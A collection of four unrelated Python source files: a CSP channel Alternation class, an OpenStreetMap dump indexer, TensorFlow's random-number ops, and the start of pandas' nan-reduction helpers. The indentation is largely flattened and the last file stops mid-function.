class Alternation(object):
""" Alternation([{cin0:None, (cout0,val):None}])
Alternation provides the basic interface to Alt. It is recommended
to use AltSelect / FairSelect as these are much more user-friendly.
    Alternation supports SkipGuard, TimeoutGuard, ChannelEndRead and
    ChannelEndWrite objects.
    Alternation guarantees priority if the flag ensurePriority = True.
    Note that an alternation always performs the chosen guard: the channel
    input or output is executed inside the alternation, so even an empty
    choice, or a choice whose result is simply ignored, still performs the
    guarded input or output.
Usage:
>>> L = []
>>> @choice
... def action(channel_input):
... L.append(channel_input)
>>> @process
... def P1(cout, n=5):
... for i in range(n):
... cout(i)
>>> @process
... def P2(cin1, cin2, n=10):
... alt = Alternation([{cin1:action(), cin2:action()}])
... for i in range(n):
... alt.execute()
>>> C1, C2 = Channel(), Channel()
>>> Parallel(P1(C1.writer()), P1(C2.writer()), P2(C1.reader(), C2.reader()))
>>> len(L)
10
>>> L.sort()
>>> L
[0, 0, 1, 1, 2, 2, 3, 3, 4, 4]
Performing a non-blocking write
>>> Alternation([
... { ( cout , datablock ): None } , # Try to write to a channel
    ...     { SkipGuard (): " print('skipped !') " } # Skip the alternation
... ]).execute()
Input with a timeout
>>> g, msg = Alternation([
... { cin : None } ,
    ...     { TimeoutGuard (seconds=1): " print('Ignore this message !') " }
... ]).select()
>>> if g == cin:
... print("Got: %s" % (msg))
"""
def __init__(self, guards, ensurePriority=False):
self.enableAcks = ensurePriority
# Preserve tuple entries and convert dictionary entries to tuple entries
self.guards = []
for g in guards:
if type(g) == tuple:
self.guards.append(g)
elif type(g) == dict:
for elem in list(g.keys()):
if type(elem) == tuple:
self.guards.append((elem[0], elem[1], g[elem]))
else:
self.guards.append((elem, g[elem]))
# The internal representation of guards is a prioritized list
# of tuples:
# input guard: (channel end, action)
# output guard: (channel end, msg, action)
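        # For example (illustrative only, assuming cin/cout are channel ends
        # and msg/action are defined by the caller):
        #   Alternation([{cin: action, (cout, msg): action}])
        # is stored internally as [(cin, action), (cout, msg, action)].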
# Default is to go one up in stackframe.
self.execute_frame = -1
def _set_execute_frame(self, steps):
if steps > 0:
self.execute_frame = -1*steps
else:
self.execute_frame = steps
def __result(self, reqs):
act=None
poison=False
retire=False
p, _ = getThreadAndName()
if p.state==SUCCESS:
for c in list(reqs.keys()):
if isinstance(c, Guard):
if c.id == p.result_ch:
act = c
c._close()
elif c.channel.name == p.result_ch:
act = c
elif p.state==POISON:
poison=True
elif p.state==RETIRE:
retire=True
return (act, poison, retire)
def _choose(self):
reqs={}
act = None
poison = False
retire = False
p, _ = getThreadAndName()
p.state = READY
p.sequence_number += 1
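        # Phase one: post a read/write request on every guard in priority
        # order.  If a guard is matched immediately, the channel lock thread
        # moves p.state away from READY and the posting loop stops early;
        # otherwise we wait below until some guard commits.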
try:
idx = 0
for prio_item in self.guards:
if len(prio_item) == 3:
c, msg, action = prio_item
c._post_write(p, msg, ack=self.enableAcks)
op=WRITE
else:
c, action = prio_item
c._post_read(p, ack=self.enableAcks)
op=READ
reqs[c]=(idx, op)
if self.enableAcks:
p.wait_ack()
if p.state != READY:
                    # The state has been changed by the process lock thread, so we can abort and read p.state.
break
idx += 1
except ChannelPoisonException:
act, poison, retire = self.__result(reqs)
if not act:
raise ChannelPoisonException
except ChannelRetireException:
act, poison, retire = self.__result(reqs)
if not act:
raise ChannelRetireException
        # If no one has offered a channel request, we wait.
if p.state == READY:
p.wait()
if not act:
act, poison, retire = self.__result(reqs)
if not act:
if poison:
raise ChannelPoisonException()
if retire:
raise ChannelRetireException()
print('We should not get here in choice!!!')
idx, op = reqs[act]
# unpickle msg if necessary
msg = p.result_msg
        if msg is None:
# Got successful write
pass
else:
# Got successful read
if type(msg) == list:
msg = msg[0]
else:
if msg == b"":
msg = None
else:
msg = pickle.loads(msg)[0]
return (idx, act, msg, op)
def execute(self):
"""
Selects the guard and executes the attached action. Action is a function or python code passed in a string.
>>> L1,L2 = [],[]
>>> @process
... def P1(cout, n):
... for i in range(n):
... cout(i)
>>> @process
... def P2(cin1, cin2, n):
... alt = Alternation([{
... cin1:"L1.append(channel_input)",
... cin2:"L2.append(channel_input)"
... }])
... for i in range(n):
... alt.execute()
>>> C1, C2 = Channel(), Channel()
>>> Parallel(P1(C1.writer(),n=10), P1(C2.writer(),n=5), P2(C1.reader(), C2.reader(), n=15))
>>> len(L1), len(L2)
(10, 5)
"""
idx, c, result_msg, op = self._choose()
if self.guards[idx]:
action = self.guards[idx][-1]
# Executing Choice object method
if isinstance(action, Choice):
if op==WRITE:
action.invoke_on_output()
else:
action.invoke_on_input(result_msg)
# Executing callback function object
elif isinstance(action, collections.Callable):
# Choice function not allowed as callback
if type(action) == types.FunctionType and action.__name__ == '__choice_fn':
raise InfoException('@choice function is not instantiated. Please use action() and not just action')
else:
# Execute callback function
if op==WRITE:
action()
else:
action(channel_input=result_msg)
# Compiling and executing string
elif type(action) == str:
# Fetch process frame and namespace
processframe= inspect.currentframe()
steps = self.execute_frame
while (steps < 0):
processframe = processframe.f_back
steps += 1
# Compile source provided in a string.
code = compile(action,processframe.f_code.co_filename + ' line ' + str(processframe.f_lineno) + ' in string' ,'exec')
f_globals = processframe.f_globals
f_locals = processframe.f_locals
if op==READ:
f_locals.update({'channel_input':result_msg})
# Execute action
exec(code, f_globals, f_locals)
elif type(action) == type(None):
pass
else:
raise Exception('Failed executing action: '+str(action))
return (c, result_msg)
def select(self):
"""
Selects the guard.
>>> L1,L2 = [],[]
>>> @process
... def P1(cout, n=5):
... for i in range(n):
... cout(i)
>>> @process
... def P2(cin1, cin2, n=10):
... alt = Alternation([{
... cin1:None,
... cin2:None
... }])
... for i in range(n):
... (g, msg) = alt.select()
... if g == cin1:
... L1.append(msg)
... if g == cin2:
... L2.append(msg)
>>> C1, C2 = Channel(), Channel()
>>> Parallel(P1(C1.writer()), P1(C2.writer()), P2(C1.reader(), C2.reader()))
>>> len(L1), len(L2)
(5, 5)
"""
idx, c, result_msg, op = self._choose()
return (c, result_msg)
|
|
import bz2, sys, os, time
import xmlprocessing
from pycontainers import compressedfile, hashtable
#UK dump size nodes=33017987 ways=4040979 relations=80851
def StoreFactoryCreate(fina, maskBits = 26, maxCachedPages = 50):
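    # Create a fresh on-disk hash table backed by a compressed file; any
    # existing file is removed first.  maskBits presumably sizes the hash
    # table and maxCachedPages bounds the page cache (both are passed through
    # to the pycontainers backend).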
try:
os.unlink(fina)
except:
pass
compfile = compressedfile.CompressedFile(fina, createFile=True)
compfile.maxCachePages = maxCachedPages
table = hashtable.HashTableFile(compfile, maskBits, 1, 1, 1, 10000, createFile=True)
return table, compfile
def StoreFactoryRead(fina, maxCachedPages = 50):
compfile = compressedfile.CompressedFile(fina, createFile=False)
compfile.maxCachePages = maxCachedPages
table = hashtable.HashTableFile(compfile, None, 0, 1, 1, 10000, createFile=False)
return table, compfile
class TagIndex(object):
def __init__(self, outFina, createFile = True):
self.nodes = 0
self.ways = 0
self.relations = 0
self.objs = 0
self.lastDisplayTime = time.time()
self.lastDisplayCount = 0
self.outFina = outFina
self.objNumStart = None
self.objNumStartPos = 0
self.objNumEnd = None
if createFile:
print "Create node tables"
self.nodeStartTable, self.nodeStartFile = StoreFactoryCreate(self.outFina+"nodestart.hash", 32, 500)
self.nodeEndTable, self.nodeEndFile = StoreFactoryCreate(self.outFina+"nodeend.hash", 32, 500)
print "Create way tables"
self.wayStartTable, self.wayStartFile = StoreFactoryCreate(self.outFina+"waystart.hash", 28, 50)
self.wayEndTable, self.wayEndFile = StoreFactoryCreate(self.outFina+"wayend.hash", 28, 50)
print "Create relation tables"
self.relationStartTable, self.relationStartFile = StoreFactoryCreate(self.outFina+"relationstart.hash", 22, 50)
self.relationEndTable, self.relationEndFile = StoreFactoryCreate(self.outFina+"relationend.hash", 22, 50)
else:
print "Open node tables"
self.nodeStartTable, self.nodeStartFile = StoreFactoryRead(self.outFina+"nodestart.hash", 500)
self.nodeEndTable, self.nodeEndFile = StoreFactoryRead(self.outFina+"nodeend.hash", 500)
print "Open way tables"
self.wayStartTable, self.wayStartFile = StoreFactoryRead(self.outFina+"waystart.hash", 50)
self.wayEndTable, self.wayEndFile = StoreFactoryRead(self.outFina+"wayend.hash", 50)
print "Open relation tables"
self.relationStartTable, self.relationStartFile = StoreFactoryRead(self.outFina+"relationstart.hash", 50)
self.relationEndTable, self.relationEndFile = StoreFactoryRead(self.outFina+"relationend.hash", 50)
self.nodeStartTable.verbose = 0
self.nodeEndTable.verbose = 0
if 0:
print "Clear node hashes"
self.nodeStartTable.clear()
self.nodeEndTable.clear()
print "Clear way hashes"
self.wayStartTable.clear()
self.wayEndTable.clear()
print "Clear relation hashes"
self.relationStartTable.clear()
self.relationEndTable.clear()
#self.nodeStartTable.allocate_mask_size(21)
#self.nodeEndTable.allocate_mask_size(21)
def __del__(self):
print "Flushing"
del self.nodeStartTable
del self.nodeEndTable
del self.wayStartTable
del self.wayEndTable
del self.relationStartTable
del self.relationEndTable
def CurrentPosFunc(self, currentPos):
pass
def TagLimitCallback(self, name, depth, attr, start, end):
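		# Called for each depth-2 XML element (node/way/relation): records the
		# byte range (start, end) of every wanted object, keyed by object id
		# and version, in the on-disk hash tables, and keeps running counts.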
if depth != 2:
return
if time.time() - self.lastDisplayTime > 1.:
rate = (self.objs - self.lastDisplayCount) / (time.time() - self.lastDisplayTime)
self.lastDisplayCount = self.objs
self.lastDisplayTime = time.time()
print self.nodes, self.ways, self.relations, self.objs, "("+str(rate)+" obj per sec)"
if 1:
print "page reads", self.nodeStartFile.cacheReads, self.nodeStartFile.diskReads
print "page writes", self.nodeStartFile.cacheWrites, self.nodeStartFile.diskWrites
doInsert = self.CurrentObjectWantedCheck()
if doInsert and name == "node":
objId = int(attr['id'])
objVersion = int(attr['version'])
if objId in self.nodeStartTable:
tmpStart = self.nodeStartTable[objId]
else:
tmpStart = {}
if objId in self.nodeEndTable:
tmpEnd = self.nodeEndTable[objId]
else:
tmpEnd = {}
tmpStart[objVersion] = start
tmpEnd[objVersion] = end
self.nodeStartTable[objId] = tmpStart
self.nodeEndTable[objId] = tmpEnd
if doInsert and name == "way":
objId = int(attr['id'])
objVersion = int(attr['version'])
if objId in self.wayStartTable:
tmpStart = self.wayStartTable[objId]
else:
tmpStart = {}
if objId in self.wayEndTable:
tmpEnd = self.wayEndTable[objId]
else:
tmpEnd = {}
tmpStart[objVersion] = start
tmpEnd[objVersion] = end
self.wayStartTable[objId] = tmpStart
self.wayEndTable[objId] = tmpEnd
if doInsert and name == "relation":
objId = int(attr['id'])
objVersion = int(attr['version'])
if objId in self.relationStartTable:
tmpStart = self.relationStartTable[objId]
else:
tmpStart = {}
if objId in self.relationEndTable:
tmpEnd = self.relationEndTable[objId]
else:
tmpEnd = {}
tmpStart[objVersion] = start
tmpEnd[objVersion] = end
self.relationStartTable[objId] = tmpStart
self.relationEndTable[objId] = tmpEnd
if name == "node":
self.nodes += 1
if name == "way":
self.ways += 1
if name == "relation":
self.relations += 1
self.objs += 1
def CurrentObjectWantedCheck(self):
doInsert = True
if self.objNumStart is not None and self.objNumStart > self.objs:
doInsert = False
if self.objNumEnd is not None and self.objNumEnd < self.objs:
doInsert = False
return doInsert
def flush(self):
self.nodeStartTable.flush()
self.nodeEndTable.flush()
self.wayStartTable.flush()
self.wayEndTable.flush()
self.relationStartTable.flush()
self.relationEndTable.flush()
if __name__ == "__main__":
if len(sys.argv) < 2:
print "Specify input file as argument"
exit(1)
if len(sys.argv) < 3:
print "Specify output file as argument"
exit(1)
infi = bz2.BZ2File(sys.argv[1])
try:
os.unlink(sys.argv[2])
except:
pass
outfi = compressedfile.CompressedFile(sys.argv[2]+"/data", createFile = True)
tagIndex = TagIndex(sys.argv[2]+"/")
parser = xmlprocessing.RewriteXml(outfi, tagIndex.TagLimitCallback, tagIndex.CurrentObjectWantedCheck, tagIndex.CurrentPosFunc)
parser.ParseFile(infi)
#print len(tagIndex.nodeStartTable)
#print tagIndex.nodeStartTable.binsInUse
#print tagIndex.nodeStartTable.hashMask
print tagIndex.nodes, tagIndex.ways, tagIndex.relations, tagIndex.objs
del tagIndex
del parser
print "All done"
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating random numbers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_random_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_random_ops import *
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
# pylint: enable=wildcard-import
def _ShapeTensor(shape):
"""Convert to an int32 or int64 tensor, defaulting to int32 if empty."""
if isinstance(shape, (tuple, list)) and not shape:
dtype = dtypes.int32
else:
dtype = None
return ops.convert_to_tensor(shape, dtype=dtype, name="shape")
@tf_export("random.normal", "random_normal")
def random_normal(shape,
mean=0.0,
stddev=1.0,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a normal distribution.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the normal
distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard deviation
of the normal distribution.
dtype: The type of the output.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random normal values.
"""
with ops.name_scope(name, "random_normal", [shape, mean, stddev]) as name:
shape_tensor = _ShapeTensor(shape)
mean_tensor = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev_tensor = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
seed1, seed2 = random_seed.get_seed(seed)
rnd = gen_random_ops.random_standard_normal(
shape_tensor, dtype, seed=seed1, seed2=seed2)
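    # Scale and shift a standard normal sample: value = mean + stddev * N(0, 1).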
mul = rnd * stddev_tensor
value = math_ops.add(mul, mean_tensor, name=name)
return value
ops.NotDifferentiable("RandomStandardNormal")
def parameterized_truncated_normal(shape,
means=0.0,
stddevs=1.0,
minvals=-2.0,
maxvals=2.0,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a truncated normal distribution.
The generated values follow a normal distribution with specified mean and
standard deviation, except that values whose magnitude is more than 2 standard
deviations from the mean are dropped and re-picked.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
means: A 0-D Tensor or Python value of type `dtype`. The mean of the
truncated normal distribution.
stddevs: A 0-D Tensor or Python value of type `dtype`. The standard
deviation of the truncated normal distribution.
minvals: A 0-D Tensor or Python value of type `dtype`. The minimum value of
the truncated normal distribution.
maxvals: A 0-D Tensor or Python value of type `dtype`. The maximum value of
the truncated normal distribution.
dtype: The type of the output.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random truncated normal values.
"""
with ops.name_scope(name, "parameterized_truncated_normal",
[shape, means, stddevs, minvals, maxvals]) as name:
shape_tensor = _ShapeTensor(shape)
means_tensor = ops.convert_to_tensor(means, dtype=dtype, name="means")
stddevs_tensor = ops.convert_to_tensor(stddevs, dtype=dtype, name="stddevs")
minvals_tensor = ops.convert_to_tensor(minvals, dtype=dtype, name="minvals")
maxvals_tensor = ops.convert_to_tensor(maxvals, dtype=dtype, name="maxvals")
seed1, seed2 = random_seed.get_seed(seed)
rnd = gen_random_ops.parameterized_truncated_normal(
shape_tensor,
means_tensor,
stddevs_tensor,
minvals_tensor,
maxvals_tensor,
seed=seed1,
seed2=seed2)
return rnd
@tf_export("random.truncated_normal", "truncated_normal")
def truncated_normal(shape,
mean=0.0,
stddev=1.0,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a truncated normal distribution.
The generated values follow a normal distribution with specified mean and
standard deviation, except that values whose magnitude is more than 2 standard
deviations from the mean are dropped and re-picked.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the
truncated normal distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard deviation
of the normal distribution, before truncation.
dtype: The type of the output.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random truncated normal values.
"""
with ops.name_scope(name, "truncated_normal", [shape, mean, stddev]) as name:
shape_tensor = _ShapeTensor(shape)
mean_tensor = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev_tensor = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
seed1, seed2 = random_seed.get_seed(seed)
rnd = gen_random_ops.truncated_normal(
shape_tensor, dtype, seed=seed1, seed2=seed2)
mul = rnd * stddev_tensor
value = math_ops.add(mul, mean_tensor, name=name)
return value
ops.NotDifferentiable("ParameterizedTruncatedNormal")
ops.NotDifferentiable("TruncatedNormal")
@tf_export("random.uniform", "random_uniform")
def random_uniform(shape,
minval=0,
maxval=None,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a uniform distribution.
The generated values follow a uniform distribution in the range
`[minval, maxval)`. The lower bound `minval` is included in the range, while
the upper bound `maxval` is excluded.
For floats, the default range is `[0, 1)`. For ints, at least `maxval` must
be specified explicitly.
In the integer case, the random integers are slightly biased unless
`maxval - minval` is an exact power of two. The bias is small for values of
`maxval - minval` significantly smaller than the range of the output (either
`2**32` or `2**64`).
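  For example (an illustrative sketch, not from the original documentation),
  the following draws `int32` values in `[0, 10)`:
  ```python
  samples = tf.random_uniform([4], maxval=10, dtype=tf.int32)
  ```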
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
minval: A 0-D Tensor or Python value of type `dtype`. The lower bound on the
range of random values to generate. Defaults to 0.
maxval: A 0-D Tensor or Python value of type `dtype`. The upper bound on
the range of random values to generate. Defaults to 1 if `dtype` is
floating point.
dtype: The type of the output: `float16`, `float32`, `float64`, `int32`,
or `int64`.
seed: A Python integer. Used to create a random seed for the distribution.
See `tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random uniform values.
Raises:
ValueError: If `dtype` is integral and `maxval` is not specified.
"""
dtype = dtypes.as_dtype(dtype)
if dtype not in (dtypes.float16, dtypes.bfloat16, dtypes.float32,
dtypes.float64, dtypes.int32, dtypes.int64):
raise ValueError("Invalid dtype %r" % dtype)
if maxval is None:
if dtype.is_integer:
raise ValueError("Must specify maxval for integer dtype %r" % dtype)
maxval = 1
with ops.name_scope(name, "random_uniform", [shape, minval, maxval]) as name:
shape = _ShapeTensor(shape)
minval = ops.convert_to_tensor(minval, dtype=dtype, name="min")
maxval = ops.convert_to_tensor(maxval, dtype=dtype, name="max")
seed1, seed2 = random_seed.get_seed(seed)
if dtype.is_integer:
return gen_random_ops.random_uniform_int(
shape, minval, maxval, seed=seed1, seed2=seed2, name=name)
else:
rnd = gen_random_ops.random_uniform(shape, dtype, seed=seed1, seed2=seed2)
return math_ops.add(rnd * (maxval - minval), minval, name=name)
ops.NotDifferentiable("RandomUniform")
@tf_export("random.shuffle", "random_shuffle")
def random_shuffle(value, seed=None, name=None):
"""Randomly shuffles a tensor along its first dimension.
The tensor is shuffled along dimension 0, such that each `value[j]` is mapped
to one and only one `output[i]`. For example, a mapping that might occur for a
3x2 tensor is:
```python
[[1, 2], [[5, 6],
[3, 4], ==> [1, 2],
[5, 6]] [3, 4]]
```
Args:
value: A Tensor to be shuffled.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of same shape and type as `value`, shuffled along its first
dimension.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_random_ops.random_shuffle(
value, seed=seed1, seed2=seed2, name=name)
@tf_export("image.random_crop", "random_crop")
def random_crop(value, size, seed=None, name=None):
"""Randomly crops a tensor to a given size.
Slices a shape `size` portion out of `value` at a uniformly chosen offset.
Requires `value.shape >= size`.
If a dimension should not be cropped, pass the full size of that dimension.
For example, RGB images can be cropped with
`size = [crop_height, crop_width, 3]`.
Args:
value: Input tensor to crop.
size: 1-D tensor with size the rank of `value`.
seed: Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
name: A name for this operation (optional).
Returns:
A cropped tensor of the same rank as `value` and shape `size`.
"""
# TODO(shlens): Implement edge case to guarantee output size dimensions.
# If size > value.shape, zero pad the result so that it always has shape
# exactly size.
with ops.name_scope(name, "random_crop", [value, size]) as name:
value = ops.convert_to_tensor(value, name="value")
size = ops.convert_to_tensor(size, dtype=dtypes.int32, name="size")
shape = array_ops.shape(value)
check = control_flow_ops.Assert(
math_ops.reduce_all(shape >= size),
["Need value.shape >= size, got ", shape, size],
summarize=1000)
shape = control_flow_ops.with_dependencies([check], shape)
limit = shape - size + 1
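    # Draw an offset uniformly in [0, limit) per dimension: sample across the
    # full integer range of size.dtype and reduce modulo `limit`; the modulo
    # introduces only a small bias when limit does not divide that range evenly.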
offset = random_uniform(
array_ops.shape(shape),
dtype=size.dtype,
maxval=size.dtype.max,
seed=seed) % limit
return array_ops.slice(value, offset, size, name=name)
@tf_export("random.multinomial", "multinomial")
def multinomial(logits, num_samples, seed=None, name=None, output_dtype=None):
"""Draws samples from a multinomial distribution.
Example:
```python
# samples has shape [1, 5], where each value is either 0 or 1 with equal
# probability.
samples = tf.multinomial(tf.log([[10., 10.]]), 5)
```
Args:
logits: 2-D Tensor with shape `[batch_size, num_classes]`. Each slice
`[i, :]` represents the unnormalized log-probabilities for all classes.
num_samples: 0-D. Number of independent samples to draw for each row slice.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: Optional name for the operation.
output_dtype: integer type to use for the output. Defaults to int64.
Returns:
The drawn samples of shape `[batch_size, num_samples]`.
"""
with ops.name_scope(name, "multinomial", [logits]):
logits = ops.convert_to_tensor(logits, name="logits")
seed1, seed2 = random_seed.get_seed(seed)
return gen_random_ops.multinomial(
logits, num_samples, seed=seed1, seed2=seed2, output_dtype=output_dtype)
ops.NotDifferentiable("Multinomial")
@tf_export("random.gamma", "random_gamma")
@deprecation.deprecated_endpoints("random_gamma")
def random_gamma(shape,
alpha,
beta=None,
dtype=dtypes.float32,
seed=None,
name=None):
"""Draws `shape` samples from each of the given Gamma distribution(s).
`alpha` is the shape parameter describing the distribution(s), and `beta` is
the inverse scale parameter(s).
Note: Because internal calculations are done using `float64` and casting has
`floor` semantics, we must manually map zero outcomes to the smallest
possible positive floating-point value, i.e., `np.finfo(dtype).tiny`. This
means that `np.finfo(dtype).tiny` occurs more frequently than it otherwise
should. This bias can only happen for small values of `alpha`, i.e.,
`alpha << 1` or large values of `beta`, i.e., `beta >> 1`.
The samples are differentiable w.r.t. alpha and beta.
The derivatives are computed using the approach described in the paper
[Michael Figurnov, Shakir Mohamed, Andriy Mnih.
Implicit Reparameterization Gradients, 2018](https://arxiv.org/abs/1805.08498)
Example:
```python
samples = tf.random_gamma([10], [0.5, 1.5])
# samples has shape [10, 2], where each slice [:, 0] and [:, 1] represents
# the samples drawn from each distribution
samples = tf.random_gamma([7, 5], [0.5, 1.5])
# samples has shape [7, 5, 2], where each slice [:, :, 0] and [:, :, 1]
# represents the 7x5 samples drawn from each of the two distributions
alpha = tf.constant([[1.],[3.],[5.]])
beta = tf.constant([[3., 4.]])
samples = tf.random_gamma([30], alpha=alpha, beta=beta)
# samples has shape [30, 3, 2], with 30 samples each of 3x2 distributions.
loss = tf.reduce_mean(tf.square(samples))
dloss_dalpha, dloss_dbeta = tf.gradients(loss, [alpha, beta])
# unbiased stochastic derivatives of the loss function
alpha.shape == dloss_dalpha.shape # True
beta.shape == dloss_dbeta.shape # True
```
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output samples
to be drawn per alpha/beta-parameterized distribution.
alpha: A Tensor or Python value or N-D array of type `dtype`. `alpha`
provides the shape parameter(s) describing the gamma distribution(s) to
sample. Must be broadcastable with `beta`.
beta: A Tensor or Python value or N-D array of type `dtype`. Defaults to 1.
`beta` provides the inverse scale parameter(s) of the gamma
distribution(s) to sample. Must be broadcastable with `alpha`.
dtype: The type of alpha, beta, and the output: `float16`, `float32`, or
`float64`.
seed: A Python integer. Used to create a random seed for the distributions.
See
`tf.set_random_seed`
for behavior.
name: Optional name for the operation.
Returns:
samples: a `Tensor` of shape
`tf.concat([shape, tf.shape(alpha + beta)], axis=0)` with values of type
`dtype`.
"""
with ops.name_scope(name, "random_gamma", [shape, alpha, beta]):
shape = ops.convert_to_tensor(shape, name="shape", dtype=dtypes.int32)
alpha = ops.convert_to_tensor(alpha, name="alpha", dtype=dtype)
beta = ops.convert_to_tensor(
beta if beta is not None else 1, name="beta", dtype=dtype)
alpha_broadcast = alpha + array_ops.zeros_like(beta)
seed1, seed2 = random_seed.get_seed(seed)
return math_ops.maximum(
np.finfo(dtype.as_numpy_dtype).tiny,
gen_random_ops.random_gamma(
shape, alpha_broadcast, seed=seed1, seed2=seed2) / beta)
@tf_export("random.poisson", "random_poisson")
@deprecation.deprecated_endpoints("random_poisson")
def random_poisson(lam, shape, dtype=dtypes.float32, seed=None, name=None):
"""Draws `shape` samples from each of the given Poisson distribution(s).
`lam` is the rate parameter describing the distribution(s).
Example:
```python
samples = tf.random_poisson([0.5, 1.5], [10])
# samples has shape [10, 2], where each slice [:, 0] and [:, 1] represents
# the samples drawn from each distribution
samples = tf.random_poisson([12.2, 3.3], [7, 5])
# samples has shape [7, 5, 2], where each slice [:, :, 0] and [:, :, 1]
# represents the 7x5 samples drawn from each of the two distributions
```
Args:
lam: A Tensor or Python value or N-D array of type `dtype`.
`lam` provides the rate parameter(s) describing the poisson
distribution(s) to sample.
shape: A 1-D integer Tensor or Python array. The shape of the output samples
to be drawn per "rate"-parameterized distribution.
dtype: The type of the output: `float16`, `float32`, `float64`, `int32` or
`int64`.
seed: A Python integer. Used to create a random seed for the distributions.
See
`tf.set_random_seed`
for behavior.
name: Optional name for the operation.
Returns:
samples: a `Tensor` of shape `tf.concat([shape, tf.shape(lam)], axis=0)`
with values of type `dtype`.
"""
with ops.name_scope(name, "random_poisson", [lam, shape]):
shape = ops.convert_to_tensor(shape, name="shape", dtype=dtypes.int32)
seed1, seed2 = random_seed.get_seed(seed)
return gen_random_ops.random_poisson_v2(
shape, lam, dtype=dtype, seed=seed1, seed2=seed2)
|
|
import sys
import itertools
import functools
import numpy as np
try:
import bottleneck as bn
_USE_BOTTLENECK = True
except ImportError: # pragma: no cover
_USE_BOTTLENECK = False
import pandas.core.common as com
import pandas.hashtable as _hash
from pandas import compat, lib, algos, tslib
from pandas.compat import builtins
from pandas.core.common import (isnull, notnull, _values_from_object,
_maybe_upcast_putmask,
ensure_float, _ensure_float64,
_ensure_int64, _ensure_object,
is_float, is_integer, is_complex,
is_float_dtype, _is_floating_dtype,
is_complex_dtype, is_integer_dtype,
is_bool_dtype, is_object_dtype,
is_datetime64_dtype, is_timedelta64_dtype,
_is_datetime_or_timedelta_dtype,
_is_int_or_datetime_dtype, _is_any_int_dtype)
class disallow(object):
def __init__(self, *dtypes):
super(disallow, self).__init__()
self.dtypes = tuple(np.dtype(dtype).type for dtype in dtypes)
def check(self, obj):
return hasattr(obj, 'dtype') and issubclass(obj.dtype.type,
self.dtypes)
def __call__(self, f):
@functools.wraps(f)
def _f(*args, **kwargs):
obj_iter = itertools.chain(args, compat.itervalues(kwargs))
if any(self.check(obj) for obj in obj_iter):
raise TypeError('reduction operation {0!r} not allowed for '
'this dtype'.format(f.__name__.replace('nan',
'')))
return f(*args, **kwargs)
return _f
class bottleneck_switch(object):
def __init__(self, zero_value=None, **kwargs):
self.zero_value = zero_value
self.kwargs = kwargs
def __call__(self, alt):
bn_name = alt.__name__
try:
bn_func = getattr(bn, bn_name)
except (AttributeError, NameError): # pragma: no cover
bn_func = None
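        # Wrap `alt` so the bottleneck implementation is used when it is
        # available, skipna is requested and the dtype is supported; if the
        # result contains infs, or anything fails, fall back to the
        # pure-numpy `alt` implementation.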
@functools.wraps(alt)
def f(values, axis=None, skipna=True, **kwds):
if len(self.kwargs) > 0:
for k, v in compat.iteritems(self.kwargs):
if k not in kwds:
kwds[k] = v
try:
if self.zero_value is not None and values.size == 0:
if values.ndim == 1:
# wrap the 0's if needed
if is_timedelta64_dtype(values):
return lib.Timedelta(0)
return 0
else:
result_shape = (values.shape[:axis] +
values.shape[axis + 1:])
result = np.empty(result_shape)
result.fill(0)
return result
if _USE_BOTTLENECK and skipna and _bn_ok_dtype(values.dtype,
bn_name):
result = bn_func(values, axis=axis, **kwds)
# prefer to treat inf/-inf as NA, but must compute the func
# twice :(
if _has_infs(result):
result = alt(values, axis=axis, skipna=skipna, **kwds)
else:
result = alt(values, axis=axis, skipna=skipna, **kwds)
except Exception:
result = alt(values, axis=axis, skipna=skipna, **kwds)
return result
return f
def _bn_ok_dtype(dt, name):
# Bottleneck chokes on datetime64
if (not is_object_dtype(dt) and
not _is_datetime_or_timedelta_dtype(dt)):
# bottleneck does not properly upcast during the sum
# so can overflow
if name == 'nansum':
if dt.itemsize < 8:
return False
return True
return False
def _has_infs(result):
if isinstance(result, np.ndarray):
if result.dtype == 'f8':
